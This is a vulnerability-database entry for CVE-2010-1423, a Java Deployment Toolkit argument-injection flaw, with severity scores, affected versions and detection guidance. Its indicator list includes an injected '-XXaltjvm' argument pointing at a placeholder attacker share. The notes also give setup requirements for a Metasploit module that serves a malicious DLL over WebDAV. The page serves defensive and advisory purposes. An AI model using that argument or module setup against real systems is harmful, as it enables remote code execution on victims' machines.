cbcvebase.
CVE-2010-1423
published 2010-04-15

CVE-2010-1423: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when…

PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
55.58%
98.9th percentile
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.

Affected

4 ranges
VendorProductVersion rangeFixed in
oraclejdk<= 1.6.0
oraclejdk
oraclejre<= 1.6.0
oraclejre

Detection & IOCsextracted from sources · hover to see the quote

command-J-XXaltjvm=\\<attacker_host>\<share>
command-J or -XXaltjvm argument to javaws.exe
otherclsid:8AD9C840-044E-11D1-B3E9-00805F499D93
otherclsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
otherapplication/npruntime-scriptable-plugin;deploymenttoolkit
otherapplication/java-deployment-toolkit
filenamejavaws.exe
  • Detect invocation of javaws.exe with -J or -XXaltjvm arguments, which are the core injection vectors for this vulnerability
  • Monitor for browser processes spawning javaws.exe with UNC paths (\\host\share) passed via -XXaltjvm, indicating WebDAV-based DLL injection
  • Detect instantiation of Java Deployment Toolkit ActiveX (CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA) or NPAPI plugin (application/npruntime-scriptable-plugin;deploymenttoolkit) calling the launch() method in browser context
  • The exploit module requires SRVPORT=80 and URIPATH=/ and uses WebDAV (OPTIONS/PROPFIND methods) to serve a malicious DLL; detect inbound WebDAV PROPFIND requests for .dll files from Windows hosts
  • ·Exploitation requires the target host to have the WebClient service (WebDAV Mini-Redirector) enabled; the attack will not succeed if this service is disabled
  • ·The Metasploit module must be run as root on a server that does not serve SMB, and requires SRVPORT=80 and URIPATH=/ for WebDAV to function
  • ·The vulnerability primarily affects Windows; Linux impact is uncertain per the advisory
  • ·All Java 6 versions since Update 10 are believed to be affected; the fix was delivered in Java 6 Update 20

CVSS provenance

nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.